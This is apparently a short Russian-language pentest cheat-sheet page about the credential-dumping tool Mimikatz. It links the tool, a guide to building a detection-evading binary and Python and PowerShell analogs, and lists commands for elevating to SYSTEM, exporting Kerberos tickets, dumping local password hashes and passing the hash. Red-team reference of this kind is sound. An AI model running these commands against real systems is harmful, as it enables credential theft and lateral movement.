Mimikatz
A little tool to play with Windows security
Link: https://github.com/gentilkiwi/mimikatz
Build
Как собирать свой бинарь mimikatz с обходом различных детектов: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/
Analogs
pypykatz
pypykatz — Mimikatz implementation in pure Python
или
Invoke-Mimikatz
Commands
Mimikatz должен быть запущен из-под админской оболочки (Run as administrator)!
Первые команды:
token::elevate — позволяет выполнять команды из-под NT AUTHORITY\SYSTEM. Нужно для дампа LSA, SAM, ...
sekurlsa::tickets /export
Экспорт тикетов в формате kirbi
sekurlsa::logonpasswords
Хеши и пароли всех локальных пользователей
sekurlsa::pth
Pass-the-Hash в примере с mimikatz
Last updated